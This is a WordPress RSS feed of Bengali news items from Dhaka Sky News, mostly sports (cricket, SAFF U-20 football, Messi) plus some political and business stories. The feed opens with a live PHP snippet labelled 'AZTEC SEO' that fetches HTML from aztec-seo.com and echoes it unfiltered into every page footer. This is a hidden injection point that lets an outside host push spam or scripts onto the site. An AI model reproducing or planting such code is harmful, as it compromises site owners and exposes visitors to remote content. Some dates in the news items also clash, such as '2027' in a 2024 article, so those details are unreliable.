/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); খেলাধুলা – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Wed, 04 Mar 2026 11:30:42 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 দেশের সব সরকারি পরিত্যক্ত ভবন চিকিৎসাকেন্দ্র করার নির্দেশ প্রধানমন্ত্রীর https://www.dhakaskynews.com/bangladesh/2026/02/28/News_ID-5613/ https://www.dhakaskynews.com/bangladesh/2026/02/28/News_ID-5613/#respond Sat, 28 Feb 2026 12:43:10 +0000 https://www.dhakaskynews.com/?p=5613
সরকারি বিভিন্ন মন্ত্রণালয় ও সংস্থার পরিত্যক্ত ভবনগুলো চিহ্নিত করে সেগুলোকে স্বাস্থ্য ও পরিবার কল্যাণ মন্ত্রণালয়ের অধীনে নিয়ে স্বাস্থ্যকেন্দ্র করার নির্দেশনা দিয়েছেন প্রধানমন্ত্রী তারেক রহমান।
বুধবার (৪ মার্চ) দুপুরে সচিবালয়ে প্রধানমন্ত্রীর দপ্তরে স্বাস্থ্যমন্ত্রী, প্রতিমন্ত্রী, উপদেষ্টা এবং স্বাস্থ্য বিশেষজ্ঞদের সঙ্গে এক বৈঠকে এ নির্দেশনা দেন সরকারপ্রধান।
প্রধানমন্ত্রীর অতিরিক্ত প্রেস সচিব আতিকুর রহমান রুমন এ তথ্য জানিয়েছেন।
তিনি জানান, বৈঠকে সরকারি বিভিন্ন মন্ত্রণালয় ও সংস্থার পরিত্যক্ত ভবনগুলো চিহ্নিত করে সেগুলোকে স্বাস্থ্য ও পরিবার কল্যাণ মন্ত্রণালয়ের অধীনে নিয়ে ক্লিনিক ও চিকিৎসাকেন্দ্র করার বিষয়েও আলোচনা হয়েছে।
রুমন জানান, শুধুমাত্র এলজিইডির পরিত্যক্ত ভবন রয়েছে ১৭০টি। প্রধানমন্ত্রী বলেছেন- সরকারি ও এর অধীনস্থ বিভিন্ন প্রতিষ্ঠানের যে পরিত্যক্ত ভবনগুলো রয়েছে, সেগুলো ক্লিনিক ও চিকিৎসাকেন্দ্র হিসেবে গড়ে তুলতে হবে। এ ব্যাপারে তিনি মন্ত্রণালয়কে প্রয়োজনীয় নির্দেশনা দিয়েছেন।
অতিরিক্ত প্রেস সচিব বলেন, প্রধানমন্ত্রী ই-হেলথ কার্ড চালুর কাজ শুরু করতে স্বাস্থ্যমন্ত্রীকে যথাযথ নির্দেশনা দিয়েছেন। সরকারের নীতি হচ্ছে চিকিৎসাসেবা জনগণের দোরগোড়ায় পৌঁছে দেওয়া। এ ব্যাপারে মন্ত্রণালয়কে আরও সক্রিয় হওয়ার নির্দেশ দিয়েছেন প্রধানমন্ত্রী।
বৈঠকে স্বাস্থ্যমন্ত্রী সরদার মো. সাখাওয়াত হোসেন, প্রতিমন্ত্রী এমএ মুহিতসহ সরকারের ঊর্ধ্বতন কর্মকর্তারা উপস্থিত ছিলেন| সূত্র: যুগান্তন
]]>
https://www.dhakaskynews.com/bangladesh/2026/02/28/News_ID-5613/feed/ 0
লঙ্কানদের হারিয়ে সুপার ফোর শুরু করল বাংলাদেশ https://www.dhakaskynews.com/sports/2025/09/21/News_ID-5562/ https://www.dhakaskynews.com/sports/2025/09/21/News_ID-5562/#respond Sun, 21 Sep 2025 05:13:22 +0000 https://www.dhakaskynews.com/?p=5562 টাইগারদের ম্যাচ জেতার জন্য শেষ ওভারে দরকার ছিল ৫ রান। দাসুন শানাকার প্রথম বলেই বাউন্ডারি হাঁকিয়ে রানে সমতা আনেন জাকের আলী। ম্যাচ হয়ে গেছে টাই। পাঁচ বলে তখন মাত্র ১ রানই দরকার। এরপর টানা দুই উইকেট হারিয়ে চাপ বাড়ে বাংলাদেশ শিবিরে। একে একে বিদায় নেন জাকের ও শেখ মেহেদী। তবে পঞ্চম বলে কাঙ্ক্ষিত রানটি তুলে নেন নাসুম আহমেদ। তাতেই সুপার ফোরের প্রথম ম্যাচে শ্রীলঙ্কাকে ৪ উইকেটে হারিয়ে শুভসূচনা করল বাংলাদেশ।

শ্বাসরুদ্ধকর এই জয়ে এশিয়া কাপের ফাইনালের সমীকরণে এগিয়ে গেল বাংলাদেশ। সুপার ফোরে টাইগাররা পরবর্তী দুটি ম্যাচ খেলবে পাকিস্তান ও ভারতের বিপক্ষে। এর যেকোনও একটি ম্যাচ জিতলেও ফাইনালের সমীকরণ উজ্জ্বল হবে বাংলাদেশের।

টাইগাররা দুবাই আন্তর্জাতিক স্টেডিয়ামে শ্রীলঙ্কার দেওয়া ১৬৯ রানের লক্ষ্যে ব্যাট করতে নামে। শুরুতেই দলীয় ১ রানে শূন্য হাতে ফিরে যান তানজিদ হাসান। এরপর লিটন দাসকে সঙ্গে নিয়ে চাপ সামলান সাইফ হাসান। ৩৪ বলে ৫৯ রানের জুটি গড়েন তারা। ব্যক্তিগত ২৩ রানে ফেরেন লিটন। তবে অন্যপ্রান্তে আক্রমণাত্মক ব্যাটিংয়ে ফিফটি তুলে নেন সাইফ। শেষ পর্যন্ত ৪৫ বলে ৬১ রান করে বিদায় নেন তিনি।

এরপর ব্যাট হাতে জ্বলে ওঠেন তাওহিদ হৃদয়। সাম্প্রতিক সময়ে ব্যাটিংয়ে খারাপ সময় কাটালেও এবার দলের প্রয়োজনেই খেলেন দায়িত্বশীল ইনিংস। ৩৭ বলে ৫৮ রানে থেমে যান তিনি। আন্তর্জাতিক টি–টোয়েন্টিতে নিজের চতুর্থ ফিফটি তুলে নেওয়ার পাশাপাশি স্পর্শ করেন এক হাজার রানের মাইলফলকও। শেষদিকে কিছুটা নাটকীয়তা তৈরি হলেও শামীম ও নাসুমে জয় নিয়েই মাঠ ছাড়ে বাংলাদেশ। এতে সুপার ফোর পর্বে আত্মবিশ্বাসী সূচনা হলো টাইগারদের।

টস হেরে ব্যাট করতে নেমে নির্ধারিত ২০ ওভারে ৬ উইকেটে ১৬৮ রান তোলেন লঙ্কানরা। ইনিংসের শুরুতে ঝড়ো ব্যাটিংয়ে দলকে এগিয়ে নেন কুশল মেন্ডিস ও পাথুম নিশাঙ্কা। তবে তাসকিন আহমেদ আঘাত হানেন প্রথমে, এরপর শেখ মেহেদী ফিরিয়ে দেন মেন্ডিস ও মিশরাকে। মাঝপথে লঙ্কানরা ব্যাটিংয়ে থমকে গেলেও শেষ দিকে দারুণ ঝড় তোলেন দাসুন শানাকা। ৩৭ বলে অপরাজিত ৬৪ রানের ইনিংসে ভর করে চ্যালেঞ্জিং সংগ্রহ পায় লঙ্কানরা। তাকে সঙ্গ দেন চারিথ আসালঙ্কা, ১২ বলে করেন ২১ রান। বাংলাদেশের হয়ে সেরা বোলার মুস্তাফিজুর রহমান ১৯ রানে নেন ৩ উইকেট। শেখ মেহেদীর ঝুলিতে গেছে ২টি।

২৪ সেপ্টেম্বর সুপার ফোরে বাংলাদেশের দ্বিতীয় ম্যাচে প্রতিপক্ষ ভারত।

]]>
https://www.dhakaskynews.com/sports/2025/09/21/News_ID-5562/feed/ 0
প্রধান উপদেষ্টার সফরসঙ্গী হচ্ছেন ৪ নারী ক্রীড়াবিদ https://www.dhakaskynews.com/sports/2025/04/18/News_ID-5521/ https://www.dhakaskynews.com/sports/2025/04/18/News_ID-5521/#respond Fri, 18 Apr 2025 17:10:22 +0000 https://www.dhakaskynews.com/?p=5521 আর্থনা সম্মেলনে যোগ দিতে আগামী সোমবার চার দিনের সফরে কাতার যাচ্ছেন প্রধান উপদেষ্টা অধ্যাপক ড. মুহাম্মদ ইউনূস। তার সঙ্গে যাবেন বাংলাদেশের চার নারী ক্রীড়াবিদ ফুটবলার আফঈদা খন্দকার ও ⁠শাহেদা আক্তার এবং ক্রিকেটার সুমাইয়া আক্তার ও শারমিন সুলতানা।

বৃহস্পতিবার প্রধান উপদেষ্টার কার্যালয়ের প্রেস উইং থেকে পাঠানো সংবাদ বিজ্ঞপ্তিতে এ তথ্য জানানো হয়।

সূত্র জানায়, এবারই প্রথম কোনো সরকার প্রধানের রাষ্ট্রীয় সফরে সঙ্গী হতে যাচ্ছেন নারী ক্রীড়বিদদের একটি দল।

বৃহস্পতিবার সন্ধ্যায় রাষ্ট্রীয় অতিথি ভবন যমুনায় প্রধান উপদেষ্টার সঙ্গে সাক্ষাৎ করেন তাঁর সফরসঙ্গী হতে যাওয়া চার ক্রীড়াবিদ। এর আগে বাংলাদেশের এই নারী ক্রীড়াবিদদের প্রধান উপদেষ্টার সঙ্গে কাতার সফরের আমন্ত্রণ জানায় কাতার ফাউন্ডেশন।

রাষ্ট্রীয় সফরে যাওয়ার আমন্ত্রণ পাওয়া ক্রীড়াবিদরা বলেন, ‘আমরা এ সফরের আমন্ত্রণ পেয়ে ভীষণ আনন্দিত এবং আমাদের টিমমেটরাও আমাদের এ আমন্ত্রণে উচ্ছ্বসিত।’

ফুটবলাররা বলেন, ‘দক্ষিণ এশিয়ার বাইরে এশিয়ার অন্য দলের সঙ্গে ম্যাচ খেলার খুব একটা সুযোগ আমাদের হয় না। আমরা কাতার নারী টিমকে আমাদের সঙ্গে প্রীতি ম্যাচ খেলার আমন্ত্রণ জানাতে চাই। এ সফরে আমরা তাদের খেলাধুলার সুযোগ-সুবিধাগুলো ঘুরে দেখতে চাই।’

দুই ক্রিকেটার প্রধান উপদেষ্টাকে বলেন, ‘কাতারে ক্রিকেট তেমনটা জনপ্রিয় নয়। আমরা এ সফরে ক্রিকেট নিয়ে তাদের মধ্যে আগ্রহ তৈরির চেষ্টা করব। আমাদের পুরুষ ক্রিকেট দল ও নারী ক্রিকেট দলের গল্পগুলো তুলে ধরব। আমরা একটি প্রেজেন্টেশন তৈরি করে নিয়ে যাব।’

এদিনের বৈঠকে নিজেদের জীবনসংগ্রামের কথা প্রধান উপদেষ্টার কাছে তুলে ধরেন ক্রীড়াবিদরা। সরকার প্রধানের সঙ্গে রাষ্ট্রীয় সফরের সুযোগ দেয়ায় প্রধান উপদেষ্টাকে বিশেষভাবে ধন্যবাদ জানান তারা।

এ সময় প্রধান উপদেষ্টা বলেন, ‘আমি চাই, তোমরা তোমাদের জীবনের সত্যিকারের কথাগুলো তাদের কাছে তুলে ধরবে। তোমরাই এ দেশের স্পোর্টস অ্যাম্বাসেডর। সেখানে তোমরা এ দেশের স্পোর্টসকে প্রতিনিধিত্ব করবে। তোমাদের এ রাষ্ট্রীয় সফরে সঙ্গে নিয়ে যেতে পেরে আমিও ভীষণ আনন্দিত।’

এদিন নারী ক্রীড়াবিদদের এ সফর সফল করতে প্রধান উপদেষ্টার কার্যালয় থেকে সর্বোচ্চ সহযোগিতা করা হবে বলেও আশ্বাস দেন ড. মুহাম্মদ ইউনূস।

]]>
https://www.dhakaskynews.com/sports/2025/04/18/News_ID-5521/feed/ 0
সাকিবকে শুভেচ্ছাদূত থেকে বাদ দিল বিএসইসি https://www.dhakaskynews.com/business/2024/08/29/News_ID-5475/ https://www.dhakaskynews.com/business/2024/08/29/News_ID-5475/#respond Thu, 29 Aug 2024 07:17:28 +0000 https://www.dhakaskynews.com/?p=5475 ক্রিকেট তারকা অলরাউন্ডার সাকিব আল হাসানকে নিজেদের শুভেচ্ছাদূত থেকে বাদ দিল পুঁজিবাজার নিয়ন্ত্রক সংস্থা বাংলাদেশ সিকিউরিটিজ অ্যান্ড এক্সচেঞ্জ কমিশন (বিএসইসি)। সাকিবের ওপর বেশ কিছু অভিযোগ ওঠায় তাকে নিজেদের শুভেচ্ছাদূত থেকে বাদ দিয়েছে বিএসইসি।

বুধবার ২৯ আগস্ট ২০২৪ বিএসইসির কমিশন সভায় এ সিদ্ধান্ত নেওয়া হয়। বিএসইসি সূত্র জানিয়েছে, বাংলাদেশ জাতীয় ক্রিকেট দলের অলরাউন্ডার সাকিব আল হাসান ছিলেন বিএসইসির ‘দেশব্যাপী বিনিয়োগ শিক্ষা কার্যক্রমের’ শুভেচ্ছাদূত। ২০১৭ সালে সাকিব আল হাসানকে এ কার্যক্রমের সঙ্গে যুক্ত করে বিএসইসি।

গত ২০২৭ সালের অক্টোবরে রাজধানীর শিল্পকলা একাডেমিতে আয়োজিত বিশ্ব বিনিয়োগকারী সপ্তাহের উদ্বোধনী অনুষ্ঠানে সাকিবকে শুভেচ্ছাদূত হিসেবে ঘোষণা করে বিএসইসি। ওই সময় বিএসইসির চেয়ারম্যানের দায়িত্বে ছিলেন এম খায়রুল হোসেন।

বিএসইসির ২০২০ সালে অধ্যাপক শিবলী রুবাইয়াত–উল–ইসলাম বিএসইসির নতুন চেয়ারম্যান হলেও শুভেচ্ছাদূত হিসেবে বহাল রাখা হয় সাকিবকে। এ সময় পুঁজিবাজারের একজন আলোচিত বিনিয়োগকারী হিসেবেও আত্মপ্রকাশ ঘটে সাকিব আল হাসানের।

জানা যায়, পুঁজিবাজারের আলোচিত কারসাজিকারক আবুল খায়ের হিরুর সঙ্গে মিলে পুঁজিবাজারের বড় বিনিয়োগকারী হয়ে যান সাকিব। গত চার থেকে পাঁচ বছরে পুঁজিবাজারে যেসব শেয়ার নিয়ে আবুল খায়ের হিরু সবচেয়ে বেশি কারসাজির ঘটনা ঘটিয়েছেন, এসব কোম্পানির শেয়ারে সাকিবেরও বিনিয়োগ ছিল।

]]>
https://www.dhakaskynews.com/business/2024/08/29/News_ID-5475/feed/ 0
নেপালকে হারিয়ে সাফ চ্যাম্পিয়ন বাংলাদেশ https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5458/ https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5458/#respond Thu, 29 Aug 2024 04:52:29 +0000 https://www.dhakaskynews.com/?p=5458 অনূর্ধ্ব-২০ সাফ চ্যাম্পিয়নশিপে স্বাগতিক নেপালকে ৪-১ গোলে হারিয়ে প্রথমবারের মতো চ্যাম্পিয়ন বাংলাদেশের যুবারা।

টুর্নামেন্টের গ্রুপ পর্বে এই নেপালের বিপক্ষে ২-১ ব্যবধানে হারতে হয়েছিল যুবাদের। তাই ফাইনালের আগে বাড়তি স্নায়ুচাপ ছিল মিরাজুলদের। তবে শেষ পর্যন্ত ওই চাপ সামলে দাপটের সাথেই শিরোপা জয় করেছে মারুফুল হকের শিষ্যরা।

নেপালের আনফা কমপ্লেক্সে প্রথমার্ধে দাপট দেখিয়েছিল স্বাগতিক নেপাল। কিন্তু গোল তাদের জন্য সোনার হরিণ হয়ে থেকেছে।

বিপরীতে দারুণ এক ফ্রি কিক থেকে এগিয়ে যায় বাংলাদেশ। বক্সের বাইরে থেকে মিরাজুলের ফ্রি কিক থেকে নেওয়া বাঁকানো শট সাইড পোস্টের ভেতরে লেগে জালে জড়িয়ে যায়। এই গোলের লিড নিয়ে প্রথমার্ধের খেলা শেষ হয়।

দ্বিতীয়ার্ধে বাংলাদেশ আক্রমণের তেজ বাড়ায়। তাই আরও তিন গোল করতে সক্ষম হয় সফরকারীরা। প্রথম গোলের কারিগর মিরাজুলের পায়েই দ্বিতীয় গোল হয়। আসাদুল ইসলাম সাকিবের ক্রসে আসাদুল মোল্লা হেড করে গোলমুখে দেন, মিরাজ চলতি বলে মাথা ছুঁইয়ে বল জালে পাঠান।

প্রথম দুই গোল করা মিরাজুল দলের তৃতীয় গোলটি করান রাব্বি হাসান রাহুলকে দিয়ে। তার পাস ধরেই আনমার্কড অবস্থায় থাকা রাহুল ডান পায়ের নিখুঁত শটে গোল করে বাংলাদেশের জয় একপ্রকার নিশ্চিত করে ফেলেন।

স্বাগতিকদের বেহাল দশা দেখে ক্ষিপ্ত হয়ে মাঠে বোতল ছুঁড়ে মারেন নেপালি সমর্থকরা। যার ফলে খেলা কিছু সময় বন্ধও থাকে। দর্শকরা তাঁতিয়ে দেওয়ার পর নেপালি ফুটবলারদের খেলায় প্রাণ ফিরে আসে। ম্যাচের শেষভাগে একটি গোল পেয়ে যায় তারা।

পরে ১০ মিনিট যোগ করা সময় পেলেও আর গোল করতে পারেনি স্বাগতিকরা। উল্টো শেষদিকে পিয়াস আহমেদ নোভা বল জালে জড়ালে বড় জয়ে শিরোপা উৎসব করে লাল-সবুজের প্রতিনিধিরা।

দেশের খ্যাতিমান কোচ মারুফুল হকের অধীনে এবারই প্রথম অনূর্ধ্ব-২০ সাফের শিরোপা জয় করল বাংলাদেশের দামালরা।

]]>
https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5458/feed/ 0
শিরোপাই লক্ষ্য বাংলাদেশের https://www.dhakaskynews.com/sports/2024/08/28/News_ID-5446/ https://www.dhakaskynews.com/sports/2024/08/28/News_ID-5446/#respond Wed, 28 Aug 2024 07:47:33 +0000 https://www.dhakaskynews.com/?p=5446 আজ জিতলেই শিরোপা উঠবে পিয়াস আহমেদদের হাতে। দু’দিন আগে পাকিস্তানকে প্রথমবারের মতো টেস্টে হারিয়েছে বাংলাদেশ। শান্তরা পাকিস্তানের মাটিতে ম্যাচটি জিতেছে ১০ উইকেটের বড় ব্যবধানে।

পাকিস্তানের বিপক্ষে পাওয়া ঐতিহাসিক জয়টা বৈষম্যবিরোধী ছাত্র আন্দোলনে পুলিশের গুলিতে নিহতদের উৎসর্গ করেছিলেন অধিনায়ক নাজমুল হাসান শান্ত।

সাফ অনূর্ধ্ব-২০ চ্যাম্পিয়নশিপেও ছাত্র আন্দোলনে নিহত আবু সাঈদ-মুগ্ধদের স্মরণ করেন বাংলাদেশি ফুটবলার। এবার তাদের জন্য ট্রফি নিয়ে আসতে চাইছেন তারা। সেখানে তাদের বাধা নেপাল।

স্বাগতিকদের বিপক্ষে বাংলাদেশ সময় বেলা পৌনে তিনটায় আনফা কমপ্লেক্সে ম্যাচটি শুরু হবে।

বয়সভিত্তিক এই প্রতিযোগিতাটি এ পর্যন্ত অনূর্ধ্ব-১৮, ১৯ ও ২০ এই তিন ক্যাটাগরিতে হয়েছে।

২০২২ সালে অনূর্ধ্ব-২০ ক্যাটাগরিতে ভারতের কাছে হেরে রানার্সআপ হয়েছিল বাংলাদেশ। এবার তাদের হারিয়েই ফাইনালে উঠেছেল মিরাজুল আসাদুলরা। এবার সেই আক্ষেপ মেটাতে চান কোচ মারুফুল হকের শিষ্যরা।

আজ জিততে পারলেই শিরোপা উঠবে পিয়াস আহমেদদের হাতে। মাঠে নামার আগে প্রতিপক্ষ হিসেবে নেপাল ভাবাচ্ছে লাল সবুজের শিবিরকে।

একই গ্রুপে থাকায় গ্রুপ পর্বেও দেখা হয়েছিল এই দুই দলের। যেখানে জয় নিয়ে মাঠ ছাড়া হয়নি বাংলাদেশের। হেরেছিল ২-১ গোলে। তবে ওই ম্যাচের ভুল শুধরে সেমিফাইনালে ভারতের বিপক্ষে জিতে ঘুরে দাঁড়িয়েছে বাংলাদেশের যুবারা।

ফাইনালেও শিষ্যদের সেই ধারাবাহিকতা দেখতে চান বাংলাদেশের কোচ মারুফুল হক।

তিনি বলেন, ‘আমাদের লক্ষ্য ছিল ফাইনাল খেলবো, চ্যাম্পিয়ন হবো। যদিও গ্রুপ পর্বে নেপালের কাছে হেরেছি। এরপর খেলোয়াড়দের নানাভাবে উজ্জীবিত করেছি। ভারতের বিপক্ষে জিতে এখন স্বপ্নের শেষ ধাপে আমরা। নেপালকে হারাতে পারলেই শিরোপা নিয়ে দেশে ফিরতে পারবো।’

তিনি যোগ করেন, ‘নেপাল ভালো দল। তাদের বেশ ক’জন মেধাবী খেলোয়াড়ও আছে। আশা করি ফাইনাল প্রতিদ্বন্দ্বিতাপূর্ণ হবে।’

]]>
https://www.dhakaskynews.com/sports/2024/08/28/News_ID-5446/feed/ 0
মেসি পাচ্ছেন অষ্টম ব্যালন ডি’অর https://www.dhakaskynews.com/bangladesh/2023/10/17/News_ID-5418/ https://www.dhakaskynews.com/bangladesh/2023/10/17/News_ID-5418/#respond Tue, 17 Oct 2023 13:10:37 +0000 https://www.dhakaskynews.com/?p=5418 ফুটবল ক্যারিয়ারে রেকর্ড অষ্টম ব্যালন ডি’অর পাচ্ছেন লিওনেল মেসি। স্প্যানিশ সংবাদ মাধ্যম দারিয়া স্পোর্টস এমনটাই দাবি করেছে।

কাতার বিশ্বকাপে আজের্ন্টিনাকে ট্রফি উপহার দেওয়ায় এবারের ব্যালন ডি’অর পুরস্কার জেতার বড় দাবিদার মেসি। ৩০ অক্টোবর ব্যালন ডি’অর প্রদান করা হবে।

এবারের ব্যালন ডি’অরে মেসির সবচেয়ে বড় প্রতিদ্বন্দ্বী ম্যানচেস্টার সিটিতে খেলা নরওয়েজিয়ান স্ট্রাইকার আর্লিং হ্যালন্ড। তিনি এক মৌসুমে পঞ্চাশের বেশি গোল করেছেন। ম্যানসিটিকে প্রথমবার ট্রেবল অর্থাৎ প্রিমিয়ার লিগ, চ্যাম্পিয়ন্স লিগ ও এফএ জিততে সহায়তা করেছেন।

কিন্তু কাতার বিশ্বকাপে অবিশ্বাস্য পারফরম্যান্স করে শ্বাসরুদ্ধকর ফাইনালে ফ্রান্সকে হারিয়ে তৃতীয়বারের মতো শিরোপা জিতে নেয় মেসির নেতৃত্বাধীন আর্জেন্টিনা। বিশ্বকাপ জয়ে বড় অবদান রাখায় মেসির হাতে উঠছে আরেকটি ব্যালন ডি’অর।

]]> https://www.dhakaskynews.com/bangladesh/2023/10/17/News_ID-5418/feed/ 0 বিশ্বকাপে অংশ নিতে ঢাকা ছাড়ল টাইগাররা https://www.dhakaskynews.com/bangladesh/2023/09/27/News_ID-5376/ https://www.dhakaskynews.com/bangladesh/2023/09/27/News_ID-5376/#respond Wed, 27 Sep 2023 11:04:52 +0000 https://www.dhakaskynews.com/?p=5376 বিশ্বকাপে অংশ নিতে ভারতের গুয়াহাটির উদ্দেশে ঢাকা ত্যাগ করেছে বাংলাদেশ ক্রিকেট দল। বুধবার বিকেল ৪টার ফ্লাইটে হযরত শাহাজালাল আন্তর্জাতিক বিমানবন্দর ত্যাগ করে সাকিব আল হাসানের নেতৃত্বাধীন দলটি। তার আগে বিমানবন্দরে ফটোসেশনে অংশ নেন টাইগাররা।

এবারের বিশ্বকাপে নেই দেশ সেরা ওপেনার তামিম ইকবাল। তাকে ছাড়াই সিনিয়র-জুনিয়রের কম্বিনেশনে দল গঠন করেছে বাংলাদেশ ক্রিকেট বোর্ড।

দেশ ছাড়ার আগে সংবাদমাধ্যমের মুখোমুখি হয়ে জাতীয় দলের টিম ম্যানেজার খালেদ মাহমুদ সুজন বলেছেন, আমাদের অভিজ্ঞতা আছে, তারুণ্য আছে। একটা কথা সিনিয়র খেলোয়াড়েরাই বলছিল, এখন না পারলে কখন! আমিও মনে করি, এখন না পারলে কখন। এটাই আমাদের হাই টাইম।

জাতীয় দলের সাবেক এই অধিনায়ক আরও বলেন, বাংলাদেশ যখন খেলে, সারা দেশ খেলে। সবাই উৎসুক হয়ে তাকিয়ে থাকেন। অনেকে নামাজ পড়েন, দোয়া করেন। অনেকে বলবে, অনেক তরুণ ছেলেরা যাচ্ছে। কিন্তু এদের ভালো করার সামর্থ্য আছে বলেই নির্বাচকেরা দলে নিয়েছে। আমাদেরকে বিশ্বাস করতে হবে, যে ১৫ জনকে নেওয়া হয়েছে এরাই সেরা। এদের ওপর আস্থা রাখতে হবে।

৫ অক্টোবর শুরু হবে ওয়ানডে বিশ্বকাপ। ৭ অক্টোবর ধর্মশালায় আফগানিস্তানের বিপক্ষে ম্যাচের মধ্য দিয়ে বিশ্বকাপ মিশন শুরু হবে টাইগারদের।

বিশ্বকাপ শুরুর আগে ২৯ সেপ্টেম্বর গুয়াহাটিতে প্রস্তুতি ম্যাচে শ্রীলংকার মুখোমুখি হবে বাংলাদেশ। ২ অক্টোবর নিজেদের দ্বিতীয় প্রস্তুতি ম্যাচে সাকিবরা মুখোমুখি হবে ইংল্যান্ডের বিপক্ষে।

]]> https://www.dhakaskynews.com/bangladesh/2023/09/27/News_ID-5376/feed/ 0 মাশরাফির বৈঠক বিসিবির সঙ্গে https://www.dhakaskynews.com/bangladesh/2023/09/26/News_ID-5368/ https://www.dhakaskynews.com/bangladesh/2023/09/26/News_ID-5368/#respond Tue, 26 Sep 2023 12:15:01 +0000 https://www.dhakaskynews.com/?p=5368 আর মাত্র ১০ দিন বাদেই ভারতে বসছে ওয়ানডে বিশ্বকাপ। টুর্নামেন্টে অংশ নিতে আগামীকাল দেশ ছাড়ার কথা রয়েছে বাংলাদেশ ক্রিকেট দলের। অথচ এখন পর্যন্ত বিশ্বকাপের দলই ঘোষণা করতে পারেনি বাংলাদেশ ক্রিকেট বোর্ড (বিসিবি)। জানা গেছে, বাংলাদেশ-নিউজিল্যান্ড ম্যাচের মাঝেই বিশ্বকাপের দল ঘোষণা করবে বিসিবি।

এর মধ্যে গুঞ্জন, দল ঘোষণার আগে সাকিব আল হাসান ও তামিম ইকবালের দ্বন্দ্ব ভোগাচ্ছে বিসিবিকে। যেই ‘দ্বন্দ্ব’ মেটাতে এখন বিসিবিতে মাশরাফি। মূলত, সাকিব-তামিম দ্বন্দ্ব নিরসন করতেই বিসিবির মিটিংয়ে ডাকা হয়েছে মাশরাফি বিন মর্তুজাকে। যেখানে স্বয়ং বিসিবি সভাপতি নাজমুল হাসানের সঙ্গে বৈঠক করবেন সাবেক এই অধিনায়ক।

কোমরের চোট পরিচর্যা করে নিউজিল্যান্ড সিরিজেই ফিরেছেন তামিম। দ্বিতীয় ম্যাচে খেলেছেন ৪৪ রানের এক ঝলমলে ইনিংস। বিশ্বকাপ দলে অনুমিত ভাবেই থাকার কথা দেশসেরা এই ওপেনারের। তবে এই চোটে বেশ বেকায়দায় পড়তে হচ্ছে তামিমকে। যে কারণে বিশ্বকাপে তিনি পুরোপুরি খেলতে পারবেন কি না, তা নিয়ে যথেষ্ট সন্দেহ-সংশয় দেখা দিয়েছে।

নিউজিল্যান্ডের বিপক্ষে দ্বিতীয় ওয়ানডে খেলার পরই সংবাদ সম্মেলনে এসে তামিম জানিয়েছিলেন, তিনি এখনও পুরোপুরি ফিট নন। ঝুঁকি এড়াতে খেলছেন না শেষ ওয়ানডে ম্যাচে। বিসিবি সূত্রের খবর, তামিম নাকি নির্বাচকদের জানিয়েছেন, যদি তাকে বিশ্বকাপ দলে নেওয়া হয়, তাহলে এটা (শতভাগ ফিট নন) মেনে নিয়েই নিতে হবে। দলে থাকলে তিনি তার সর্বোচ্চটা দিয়েই খেলার চেষ্টা করবেন। তার কোমরের সমস্যার কথা গুরুত্ব সহকারে সামনে এনেছেন।

তবে এমন ‘আনফিট’ ক্রিকেটারকে বিশ্বকাপের মত বড় আসরে বয়ে বেড়াতে চাচ্ছেন না কোচ ও অধিনায়ক। বিসিবি সূত্রের খবর, তামিমের এমন শর্তে রাজি নয় অধিনায়ক সাকিব আল হাসান। কাল রাতে বিসিবি সভাপতি নাজমুল হাসানের বাসায় হওয়া এক সভায় অধিনায়ক সাকিব আল হাসান এবং কোচ চন্ডিকা হাথুরুসিংহে বোর্ড সভাপতিকে জানিয়েছেন, বিশ্বকাপের মতো বড় আসরে তারা কোনো ‘আনফিট’ বা ‘অর্ধেক ফিট’ ক্রিকেটারকে দলে চান না। এমনকি তিনি যদি হন তামিম ইকবালের মতো অভিজ্ঞ কেউও।

]]>
https://www.dhakaskynews.com/bangladesh/2023/09/26/News_ID-5368/feed/ 0
মেসি ম্যাজিকে ফাইনালে ইন্টার মিয়ামি https://www.dhakaskynews.com/bangladesh/2023/08/16/News_ID-5205/ https://www.dhakaskynews.com/bangladesh/2023/08/16/News_ID-5205/#respond Wed, 16 Aug 2023 04:30:34 +0000 https://www.dhakaskynews.com/?p=5205 নিজের ফুটবল জাদু দেখিয়ে যুক্তরাষ্ট্রকে বুঁদ করে রেখেছেন  আর্জেন্টাইন তারকা লিওনেল মেসি। এরই ধারাবাহিকতায় আজ ফিলাডেলফিয়া ইউনিয়নের বিপক্ষে সেমিফাইনালে বড় জয় পেয়েছে ইন্টার মায়ামি। প্রতিপক্ষকে ৪-১ গোলে বিধ্বস্ত করে ফাইনালে উঠেছে ক্লাবটি।

যুক্তরাষ্ট্রের ঘরোয়া ফুটবলের আজকের ম্যাচেও দুর্দান্ত গোল করে রেকর্ড গড়েছেন মেসি। এই ম্যাচ নিয়ে পরপর ছয় ম্যাচ ইন্টার মায়ামিকে জিতিয়ে ফাইনাল নিশ্চিত করল মায়ামি। ছয় ম্যাচেই গোলের দেখা পেয়ে রিবল রেকর্ড গড়েছেন আর্জেন্টাইন এই তারকা।

এ নিয়ে প্রথমবারের মতো লিগস কাপের ফাইনালে উঠেছে ইন্টার মায়ামি। নিজেদের ইতিহাসে প্রথমবারের মতো কোনো টুর্নামেন্টের ফাইনালে খেলবে তারা।

বুধবার ভোরে পেনসিলভ্যানিয়ার সুবারু পার্কে লিগস কাপের সেমি-ফাইনালের ম্যাচে ফিলাডেলফিয়া ইউনিয়নকে ৪-১ গোলের ব্যবধানে হারায় ইন্টার মায়ামি।

মেসি ছাড়াও দলের হয়ে একটি করে গোল করেছেন জোসেফ মার্টিনেজ, জর্দি আলবা, দাভিদ রুইজ। স্বাগতিকদের হয়ে একমাত্র গোলটি করেন আলেহান্দ্রো বেদয়া।

]]>
https://www.dhakaskynews.com/bangladesh/2023/08/16/News_ID-5205/feed/ 0